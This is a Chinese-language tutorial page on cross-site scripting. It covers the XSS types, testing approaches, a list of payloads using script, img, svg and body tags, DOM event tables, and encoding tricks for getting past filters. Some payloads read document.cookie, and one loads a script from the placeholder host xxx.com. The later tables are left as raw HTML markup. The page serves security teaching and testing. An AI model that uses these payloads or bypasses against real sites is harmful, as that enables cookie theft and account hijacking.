Web安全 - XSS - 《Decentralized Alliance - 去中心化同盟》

定义
XSS 特征
XSS与CSRF的区别（面试常问）
XSS 攻击面
XSS 相关payload
XSS的绕过方式
参考链接

定义

跨站脚本攻击XSS(Cross Site Scripting)，为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页面时，嵌入Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击
XSS分为：反射型XSS，存储型XSS，DOM型XSS

反射型XSS

具体攻击流程如下：

攻击者将payload放置在url链接中（这是针对是GET型反射XSS）
用户点击该恶意链接
web服务将XSS代码（JavaScript代码）以及视图返回给客户端
客户端解析视图以及XSS代码（JavaScript代码），并将执行结果发送到XSS平台
攻击者访问XSS平台，读取用户的敏感信息（Cookie）

存储型XSS

具体攻击流程如下：
攻击者向web服务插入XSS代码
web服务会将其结果存储到数据库中
用户正常访问web服务
web服务将数据库的数据以及视图返回给前端，前端渲染视图并加载数据，其中数据里包含恶意XSS代码（JavaScript代码）
客户端渲染视图，加载XSS代码，并向攻击者的web服务发送敏感信息
攻击者读取用户的敏感信息

DOM型XSS

具体攻击流程如下：
攻击者将payload放置在url链接中（这是针对是GET型反射XSS）
用户点击恶意链接，并打开浏览器
此时浏览器客户端并不会发起http请求到web服务，而是在浏览器客户端执行XSS（JavaScript代码）
此时将XSS代码执行结果发送给攻击者的恶意服务
攻击者访问自己的XSS平台并读取用户的敏感信息
XSS 特征
| 类别 | 特征 | | —- | —- | | 反射型XSS | 非持久化，需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。反射型XSS大多数是用来盗取用户的Cookie信息。 | | 存储型XSS | 持久化，代码是存储在服务器中的，如在个人信息或发表文章等地方，插入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。这种XSS比较危险，容易造成蠕虫，盗窃cookie | | DOM型XSS | 不经过后端，DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞，DOM-XSS是通过url传入参数去控制触发的，其实也属于反射型XSS。DOM的详解：DOM文档对象模型 |

XSS与CSRF的区别（面试常问）

类别	特征
XSS	1. 主要是加载JavaScript代码，在客户端执行 1. 虽然经过后端，数据库（存储型），但主要需要客户端执行XSS代码，才能生效 1. DOM型XSS一定不经过后端，只是对浏览器客户端发起的攻击 1. XSS攻击针对的是用户层面的攻击（攻击客户端）
CSRF	1. 主要是欺骗服务器，虽然是由用户发起，但是服务器无法判断是否是不是用户想要发起的请求 1. 一定会经过后端处理，不然无法执行 1. CSRF是一种身份伪造攻击，来对服务器进行欺骗的一种攻击手法

XSS 攻击面

XSS主要是攻击客户端浏览器，但是客户端浏览器侧的JavaScript并不像Node.js这种后端JavaScript代码可以执行命令，那么XSS只能用来弹窗测试吗？实际上并不是这样的，如果你的JavaScript代码能力很强，那么可以钓鱼、窃取Cookie、令牌、攻击浏览器（2021年4月Chrome 0 Day）、蠕虫攻击、挂黑页（放广告刷流量）、内网探测（针对HTTP，websocket）等等

黑盒测试

尽可能找到一切用户可控并且能够输出在页面代码中的地方，比如下面这些：

URL的每一个参数
URL本身
表单
搜索框

常见业务场景
重灾区：评论区、留言区、个人信息、订单信息等
针对型：站内信、网页即时通讯、私信、意见反馈
存在风险：搜索框、当前目录、图片属性等
白盒测试(代码审计)
关于XSS的代码审计主要就是从接收参数的地方和一些关键词入手。
PHP中常见的接收参数的方式有$_GET、$_POST、$_REQUEST等等，可以搜索所有接收参数的地方。然后对接收到的数据进行跟踪，看看有没有输出到页面中，然后看输出到页面中的数据是否进行了过滤和html编码等处理。
也可以搜索类似echo这样的输出语句，跟踪输出的变量是从哪里来的，我们是否能控制，如果从数据库中取的，是否能控制存到数据库中的数据，存到数据库之前有没有进行过滤等等。
大多数程序会对接收参数封装在公共文件的函数中统一调用，我们就需要审计这些公共函数看有没有过滤，能否绕过等等。
同理审计DOM型注入可以搜索一些js操作DOM元素的关键词进行审计。
XSS 相关payload
xss 主要是针对浏览器客户端的一种攻击，那么需要执行JavaScript代码，那么无疑需要使用到JavaScript语言以及在HTML中可以加载JavaScript的标签
标签类
script
标签是最直接的XSS payload，标签可以在浏览器渲染DOM树的时候同步执行JavaScript代码，他可以引用外部，也可以将代码插入标签内
```
<script>alert("xss")</script>
<script>alert(/xss/)</script>
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<script src=http://xxx.com/xss.js></script>
```
svg
标签是标记定义 SVG 图形的容器，其在onload方法中是在 SVG 容器初始化的时候执行代码
```
<svg onload="alert(1)">
<svg onload="alert(1)">
```
img
标签是加载图片资源的标签，其在无法加载图片资源的时候会执行onerror方法
```
<img src=1 οnerrοr=alert("/xss/")>
<img src=1 οnerrοr=alert(document.cookie)>
<img src="正确图片地址" onload="alert(/xss/)" />
```
body
是定义HTML文档的主体。其包含文档的所有内容（比如文本、超链接、图像、表格和列表等等。）
```
<body onload=alert(/xss/)>
<body onpageshow=alert(1)>
```
video

标签是引用远程媒体视频的标签，用法与img类似
```
<video onerror="alert(/xss/)" src="1"/>
```
style
标签是加载CSS资源的标签
```
<style οnlοad=alert(1)></style>
```
表单类
在web中，最常见的为表单了，表单中的标签有、等等
在这里更多的是闭合语句来构成XSS比如
```
"/><script>alert(/xss/)</script>
></textarea><script>alert(/xss/)</script>
...
```
事件类
在HTML中有许多事件操作的方法（DOM事件），如onclick事件，ondblclick事件等等，只需要用户点击，或者双击也可以执行JavaScript代码，在这里就需要闭合，在块级元素中添加事件方法。
常见的DOM事件方法如下
鼠标事件
| 属性 | 描述 | DOM | | —- | —- | —- | | onclick | 当用户点击某个对象时调用的事件句柄。 | 2 | | oncontextmenu | 在用户点击鼠标右键打开上下文菜单时触发 | | | ondblclick | 当用户双击某个对象时调用的事件句柄。 | 2 | | onmousedown | 鼠标按钮被按下。 | 2 | | onmouseenter | 当鼠标指针移动到元素上时触发。 | 2 | | onmouseleave | 当鼠标指针移出元素时触发 | 2 | | onmousemove | 鼠标被移动。 | 2 | | onmouseover | 鼠标移到某元素之上。 | 2 | | onmouseout | 鼠标从某元素移开。 | 2 | | onmouseup | 鼠标按键被松开。 | 2 |

键盘事件

属性	描述	DOM
onkeydown	某个键盘按键被按下。	2
onkeypress	某个键盘按键被按下并松开。	2
onkeyup	某个键盘按键被松开。	2

框架/对象（Frame/Object）事件

属性	描述	DOM
onabort	图像的加载被中断。 (	2
onbeforeunload	该事件在即将离开页面（刷新或关闭）时触发	2
onerror	在加载文档或图像时发生错误。 (
onhashchange	该事件在当前 URL 的锚部分发生修改时触发。
onload	一张页面或一幅图像完成加载。	2
onpageshow	该事件在用户访问页面时触发
onpagehide	该事件在用户离开当前网页跳转到另外一个页面时触发
onresize	窗口或框架被重新调整大小。	2
onscroll	当文档被滚动时发生的事件。	2
onunload	用户退出页面。 ( 和 )	2

表单事件

属性	描述	DOM
onblur	元素失去焦点时触发	2
onchange	该事件在表单元素的内容改变时触发( , , )</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onfocus.html">onfocus</a></td> <td>元素获取焦点时触发</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onfocusin.html">onfocusin</a></td> <td>元素即将获取焦点时触发</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onfocusout.html">onfocusout</a></td> <td>元素即将失去焦点时触发</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-oninput.html">oninput</a></td> <td>元素获取用户输入时触发</td> <td>3</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onreset.html">onreset</a></td> <td>表单重置时触发</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onsearch.html">onsearch</a></td> <td>用户向搜索域输入文本时触发 ( <input="search">)</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onselect.html">onselect</a></td> <td>用户选取文本时触发 ( <input> 和 <textarea>)</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onsubmit.html">onsubmit</a></td> <td>表单提交时触发</td> <td>2</td> </tr> </tbody> </table> <p><a name="MFVoK"></a></p> <h4 id="f1hxhi"><a name="f1hxhi" class="reference-link"></a><span class="header-link octicon octicon-link"></span>剪贴板事件</h4><table> <thead> <tr> <th>属性</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-oncopy.html">oncopy</a></td> <td>该事件在用户拷贝元素内容时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-oncut.html">oncut</a></td> <td>该事件在用户剪切元素内容时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onpaste.html">onpaste</a></td> <td>该事件在用户粘贴元素内容时触发</td> </tr> </tbody> </table> <p><a name="RjXaB"></a></p> <h4 id="b3zvt2"><a name="b3zvt2" class="reference-link"></a><span class="header-link octicon octicon-link"></span>打印事件</h4><table> <thead> <tr> <th>属性</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onafterprint.html">onafterprint</a></td> <td>该事件在页面已经开始打印，或者打印窗口已经关闭时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onbeforeprint.html">onbeforeprint</a></td> <td>该事件在页面即将开始打印时触发</td> </tr> </tbody> </table> <p><a name="WLC47"></a></p> <h4 id="byhwuy"><a name="byhwuy" class="reference-link"></a><span class="header-link octicon octicon-link"></span>拖动事件</h4><table> <thead> <tr> <th>事件</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-ondrag.html">ondrag</a></td> <td>该事件在元素正在拖动时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-ondragend.html">ondragend</a></td> <td>该事件在用户完成元素的拖动时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-ondragenter.html">ondragenter</a></td> <td>该事件在拖动的元素进入放置目标时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-ondragleave.html">ondragleave</a></td> <td>该事件在拖动元素离开放置目标时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-ondragover.html">ondragover</a></td> <td>该事件在拖动元素在放置目标上时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-ondragstart.html">ondragstart</a></td> <td>该事件在用户开始拖动元素时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-ondrop.html">ondrop</a></td> <td>该事件在拖动元素放置在目标区域时触发</td> </tr> </tbody> </table> <p><a name="p5Eo9"></a></p> <h4 id="eq0xcs"><a name="eq0xcs" class="reference-link"></a><span class="header-link octicon octicon-link"></span>多媒体（Media）事件</h4><table> <thead> <tr> <th>事件</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onabort-media.html">onabort</a></td> <td>事件在视频/音频（audio/video）终止加载时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-oncanplay.html">oncanplay</a></td> <td>事件在用户可以开始播放视频/音频（audio/video）时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-oncanplaythrough.html">oncanplaythrough</a></td> <td>事件在视频/音频（audio/video）可以正常播放且无需停顿和缓冲时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-ondurationchange.html">ondurationchange</a></td> <td>事件在视频/音频（audio/video）的时长发生变化时触发。</td> <td></td> </tr> <tr> <td>onemptied</td> <td>当期播放列表为空时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onended.html">onended</a></td> <td>事件在视频/音频（audio/video）播放结束时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onerror-media.html">onerror</a></td> <td>事件在视频/音频（audio/video）数据加载期间发生错误时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onloadeddata.html">onloadeddata</a></td> <td>事件在浏览器加载视频/音频（audio/video）当前帧时触发触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onloadedmetadata.html">onloadedmetadata</a></td> <td>事件在指定视频/音频（audio/video）的元数据加载后触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onloadstart.html">onloadstart</a></td> <td>事件在浏览器开始寻找指定视频/音频（audio/video）触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onpause.html">onpause</a></td> <td>事件在视频/音频（audio/video）暂停时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onplay.html">onplay</a></td> <td>事件在视频/音频（audio/video）开始播放时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onplaying.html">onplaying</a></td> <td>事件在视频/音频（audio/video）暂停或者在缓冲后准备重新开始播放时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onprogress.html">onprogress</a></td> <td>事件在浏览器下载指定的视频/音频（audio/video）时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onratechange.html">onratechange</a></td> <td>事件在视频/音频（audio/video）的播放速度发送改变时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onseeked.html">onseeked</a></td> <td>事件在用户重新定位视频/音频（audio/video）的播放位置后触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onseeking.html">onseeking</a></td> <td>事件在用户开始重新定位视频/音频（audio/video）时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onstalled.html">onstalled</a></td> <td>事件在浏览器获取媒体数据，但媒体数据不可用时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onsuspend.html">onsuspend</a></td> <td>事件在浏览器读取媒体数据中止时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-ontimeupdate.html">ontimeupdate</a></td> <td>事件在当前的播放位置发送改变时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onvolumechange.html">onvolumechange</a></td> <td>事件在音量发生改变时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onwaiting.html">onwaiting</a></td> <td>事件在视频由于要播放下一帧而需要缓冲时触发。</td> </tr> </tbody> </table> <p><a name="LcX28"></a></p> <h4 id="5yrhtp"><a name="5yrhtp" class="reference-link"></a><span class="header-link octicon octicon-link"></span>动画事件</h4><table> <thead> <tr> <th>事件</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-animationend.html">animationend</a></td> <td>该事件在 CSS 动画结束播放时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-animationiteration.html">animationiteration</a></td> <td>该事件在 CSS 动画重复播放时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-animationstart.html">animationstart</a></td> <td>该事件在 CSS 动画开始播放时触发</td> </tr> </tbody> </table> <p><a name="oFZqo"></a></p> <h4 id="clue9l"><a name="clue9l" class="reference-link"></a><span class="header-link octicon octicon-link"></span>过渡事件</h4><table> <thead> <tr> <th>事件</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-transitionend.html">transitionend</a></td> <td>该事件在 CSS 完成过渡后触发。</td> </tr> </tbody> </table> <p><a name="I5txg"></a></p> <h4 id="50w25o"><a name="50w25o" class="reference-link"></a><span class="header-link octicon octicon-link"></span>其他事件</h4><table> <thead> <tr> <th>事件</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td>onmessage</td> <td>该事件通过或者从对象(WebSocket, Web Worker, Event Source 或者子 frame 或父窗口)接收到消息时触发</td> <td></td> </tr> <tr> <td>onmousewheel</td> <td>已废弃。使用 <a rel="nofollow" href="https://www.runoob.com/jsref/event-onwheel.html">onwheel</a><br /> 事件替代</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-ononline.html">ononline</a></td> <td>该事件在浏览器开始在线工作时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onoffline.html">onoffline</a></td> <td>该事件在浏览器开始离线工作时触发。</td> <td></td> </tr> <tr> <td>onpopstate</td> <td>该事件在窗口的浏览历史（history 对象）发生改变时触发。</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onshow.html">onshow</a></td> <td>该事件当 <menu> 元素在上下文菜单显示时触发</td> <td></td> </tr> <tr> <td>onstorage</td> <td>该事件在 Web Storage(HTML 5 Web 存储)更新时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-ontoggle.html">ontoggle</a></td> <td>该事件在用户打开或关闭 <details> 元素时触发</td> <td></td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-onwheel.html">onwheel</a></td> <td>该事件在鼠标滚轮在元素上下滚动时触发</td> </tr> </tbody> </table> <p><a name="ASB90"></a></p> <h4 id="1dnwx"><a name="1dnwx" class="reference-link"></a><span class="header-link octicon octicon-link"></span>事件对象</h4><p><a name="XnxMG"></a></p> <h5 id="3ubgts"><a name="3ubgts" class="reference-link"></a><span class="header-link octicon octicon-link"></span>常量</h5><table> <thead> <tr> <th>静态变量</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td>CAPTURING-PHASE</td> <td>当前事件阶段为捕获阶段(1)</td> <td>1</td> </tr> <tr> <td>AT-TARGET</td> <td>当前事件是目标阶段,在评估目标事件(1)</td> <td>2</td> </tr> <tr> <td>BUBBLING-PHASE</td> <td>当前的事件为冒泡阶段 (3)</td> <td>3</td> </tr> </tbody> </table> <p><a name="wuYM1"></a></p> <h5 id="c0e7yv"><a name="c0e7yv" class="reference-link"></a><span class="header-link octicon octicon-link"></span>属性</h5><table> <thead> <tr> <th>属性</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-bubbles.html">bubbles</a></td> <td>返回布尔值，指示事件是否是起泡事件类型。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-cancelable.html">cancelable</a></td> <td>返回布尔值，指示事件是否可拥可取消的默认动作。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-currenttarget.html">currentTarget</a></td> <td>返回其事件监听器触发该事件的元素。</td> <td>2</td> </tr> <tr> <td>eventPhase</td> <td>返回事件传播的当前阶段。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-target.html">target</a></td> <td>返回触发此事件的元素（事件的目标节点）。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-timestamp.html">timeStamp</a></td> <td>返回事件生成的日期和时间。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-type.html">type</a></td> <td>返回当前 Event 对象表示的事件的名称。</td> <td>2</td> </tr> </tbody> </table> <p><a name="ja5Iw"></a></p> <h5 id="g6khi4"><a name="g6khi4" class="reference-link"></a><span class="header-link octicon octicon-link"></span>方法</h5><table> <thead> <tr> <th>方法</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td>initEvent()</td> <td>初始化新创建的 Event 对象的属性。</td> <td>2</td> </tr> <tr> <td>preventDefault()</td> <td>通知浏览器不要执行与事件关联的默认动作。</td> <td>2</td> </tr> <tr> <td>stopPropagation()</td> <td>不再派发事件。</td> <td>2</td> </tr> </tbody> </table> <p><a name="moFhO"></a></p> <h4 id="3ql1g3"><a name="3ql1g3" class="reference-link"></a><span class="header-link octicon octicon-link"></span>目标事件对象</h4><p><a name="hqBSL"></a></p> <h5 id="cprkfu"><a name="cprkfu" class="reference-link"></a><span class="header-link octicon octicon-link"></span>方法</h5><table> <thead> <tr> <th>方法</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td>addEventListener()</td> <td>允许在目标事件中注册监听事件(IE8 = attachEvent())</td> <td>2</td> </tr> <tr> <td>dispatchEvent()</td> <td>允许发送事件到监听器上 (IE8 = fireEvent())</td> <td>2</td> </tr> <tr> <td>removeEventListener()</td> <td>运行一次注册在事件目标上的监听事件(IE8 = detachEvent())</td> <td>2</td> </tr> </tbody> </table> <p><a name="ipVmT"></a></p> <h4 id="f3kwn3"><a name="f3kwn3" class="reference-link"></a><span class="header-link octicon octicon-link"></span>事件监听对象</h4><p><a name="Lv7PD"></a></p> <h5 id="dyf9dd"><a name="dyf9dd" class="reference-link"></a><span class="header-link octicon octicon-link"></span>方法</h5><table> <thead> <tr> <th>方法</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td>handleEvent()</td> <td>把任意对象注册为事件处理程序</td> <td>2</td> </tr> </tbody> </table> <p><a name="gdOkB"></a></p> <h4 id="dr0qo9"><a name="dr0qo9" class="reference-link"></a><span class="header-link octicon octicon-link"></span>文档事件对象</h4><p><a name="bxaDC"></a></p> <h5 id="eyrohn"><a name="eyrohn" class="reference-link"></a><span class="header-link octicon octicon-link"></span>方法</h5><table> <thead> <tr> <th>方法</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td>createEvent()</td> <td></td> <td>2</td> </tr> </tbody> </table> <p><a name="ZGPiT"></a></p> <h4 id="9lx5mw"><a name="9lx5mw" class="reference-link"></a><span class="header-link octicon octicon-link"></span>鼠标/键盘事件对象</h4><p><a name="xmPN6"></a></p> <h5 id="4yrfx2"><a name="4yrfx2" class="reference-link"></a><span class="header-link octicon octicon-link"></span>属性</h5><table> <thead> <tr> <th>属性</th> <th>描述</th> <th>DOM</th> </tr> </thead> <tbody> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-altkey.html">altKey</a></td> <td>返回当事件被触发时，”ALT” 是否被按下。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-button.html">button</a></td> <td>返回当事件被触发时，哪个鼠标按钮被点击。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-clientx.html">clientX</a></td> <td>返回当事件被触发时，鼠标指针的水平坐标。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-clienty.html">clientY</a></td> <td>返回当事件被触发时，鼠标指针的垂直坐标。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-ctrlkey.html">ctrlKey</a></td> <td>返回当事件被触发时，”CTRL” 键是否被按下。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-key-location.html">Location</a></td> <td>返回按键在设备上的位置</td> <td>3</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-key-charcode.html">charCode</a></td> <td>返回onkeypress事件触发键值的字母代码。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-key-key.html">key</a></td> <td>在按下按键时返回按键的标识符。</td> <td>3</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-key-keycode.html">keyCode</a></td> <td>返回onkeypress事件触发的键的值的字符代码，或者 onkeydown 或 onkeyup 事件的键的代码。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-key-which.html">which</a></td> <td>返回onkeypress事件触发的键的值的字符代码，或者 onkeydown 或 onkeyup 事件的键的代码。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-metakey.html">metaKey</a></td> <td>返回当事件被触发时，”meta” 键是否被按下。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-relatedtarget.html">relatedTarget</a></td> <td>返回与事件的目标节点相关的节点。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-screenx.html">screenX</a></td> <td>返回当某个事件被触发时，鼠标指针的水平坐标。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-screeny.html">screenY</a></td> <td>返回当某个事件被触发时，鼠标指针的垂直坐标。</td> <td>2</td> </tr> <tr> <td><a rel="nofollow" href="https://www.runoob.com/jsref/event-shiftkey.html">shiftKey</a></td> <td>返回当事件被触发时，”SHIFT” 键是否被按下。</td> <td>2</td> </tr> </tbody> </table> <p><a name="IaT72"></a></p> <h5 id="g5rm95"><a name="g5rm95" class="reference-link"></a><span class="header-link octicon octicon-link"></span>方法</h5><table> <thead> <tr> <th>方法</th> <th>描述</th> <th>W3C</th> </tr> </thead> <tbody> <tr> <td>initMouseEvent()</td> <td>初始化鼠标事件对象的值</td> <td>2</td> </tr> <tr> <td>initKeyboardEvent()</td> <td>初始化键盘事件对象的值</td> </tr> </tbody> </table> <p><a name="A2Bo0"></a></p> <h2 id="468ryb"><a name="468ryb" class="reference-link"></a><span class="header-link octicon octicon-link"></span>XSS的绕过方式</h2><p><a name="HrUVR"></a></p> <h3 id="gi7ltw"><a name="gi7ltw" class="reference-link"></a><span class="header-link octicon octicon-link"></span>JavaScript伪协议</h3><pre><code class="lang-html">javascript:alert(/xss/); <a href=javascript:alert(1)>111</a><!--引号可以去掉--> <!--支持伪协议的属性有：href，lowsrc，bgsound，background，action，dynsrc--> <!-- 好多浏览器都不支持了，a标签还支持，但是需要点击才能生效--> </code></pre> <p><a name="VIHJS"></a></p> <h3 id="3gupju"><a name="3gupju" class="reference-link"></a><span class="header-link octicon octicon-link"></span>编码</h3><p>浏览器在解析HTML文档时无论按照什么顺序，主要有三个过程：HTML解析、JS解析和URL解析，每个解析器负责HTML文档中各自对应部分的解析工作。<br />首先浏览器接收到一个HTML文档时，会触发HTML解析器对HTML文档进行词法解析，这一过程完成HTML解码并创建DOM树，接下来JavaScript解析器会。介入对内联脚本进行解析，这一过程完成JS的解码工作，如果浏览器遇到需要URL的上下文环境，这时URL解析器也会介入完成URL的解码工作，URL解析器的解码顺序会根据URL所在位置不同，可能在JavaScript解析器之前或之后解析。<br />浏览器的解析规则：浏览器收到HTML内容后，会从头开始解析。当遇到JS代码时，会使用JS解析器解析。当遇到URL时，会使用URL解析器解析。遇到CSS则用CSS解析器解析。尤其当遇到复杂代码时，可能该段代码会经过多个解析器解析。</p> <pre><code class="lang-html"><img src=# onerror="alert&#x28/xss/&#x29"> <img src=# onerror="alert&#x000000000028/xss/&#x29"> <!--首先经过HTML解析将alert&#x28/xss/&#x29"解析为alert(1)，然后JS解析器解析后执行alert(1)，导致弹窗。然后第二个payload中&#x000000000028不管有多少个0，HTML解析器都会正常解析，绕WAF的时候非常有用--> <img src=# onerror="\u0061lert(/xss/)"> <!--首先经过HTML解析，然后JS解析器成功将\u0061lert(/xss/)解析为alert(/xss/)所以能弹窗但是用 Unicode 转义序列来表示一个控制字符时，例如单引号、双引号、圆括号等等，它们将不会被解释成控制字符，而仅仅被解码并解析为标识符名称或者字符串常量--> <a href="javascript:%61lert%281%29">xss</a> <!--首先经过HTML解析，因为href会涉及到URL所以会先进行URL解析，将%61lert%281%29解析为alert(1)最后再经过JS解析器成功解析alert(1) URL 解析过程中有一个细节了，不能对协议类型进行任何的编码操作，否则URL解析器会认为它无类型--> </code></pre> <p><a name="ZqeGH"></a></p> <h3 id="d2lxht"><a name="d2lxht" class="reference-link"></a><span class="header-link octicon octicon-link"></span>双写</h3><p><a name="Tk7hj"></a></p> <h3 id="ckc4mm"><a name="ckc4mm" class="reference-link"></a><span class="header-link octicon octicon-link"></span>大小写</h3><p><a name="njubY"></a></p> <h3 id="qwlqa"><a name="qwlqa" class="reference-link"></a><span class="header-link octicon octicon-link"></span>一些案例</h3><pre><code class="lang-html"><img src=# onerror="location='javascript:alert(1)'"> <img src=# onerror="location='javascript:%61lert%281%29'"> <img src=# onerror="location='j\x61vascript:%61lert%281%29'"> <img src=# onerror="loc\u0061tion='j\x61vascript:%61lert%281%29'"> <img src=# onerror="loc\u0061tion='java'+'scri'+'pt:'+'ale'+'rt%281%29'"> </code></pre> <p><a name="NBTjZ"></a></p> <h2 id="b5cmtm"><a name="b5cmtm" class="reference-link"></a><span class="header-link octicon octicon-link"></span>参考链接</h2><p><a rel="nofollow" href="https://www.runoob.com/jsref/dom-obj-event.html">https://www.runoob.com/jsref/dom-obj-event.html</a><br /><a rel="nofollow" 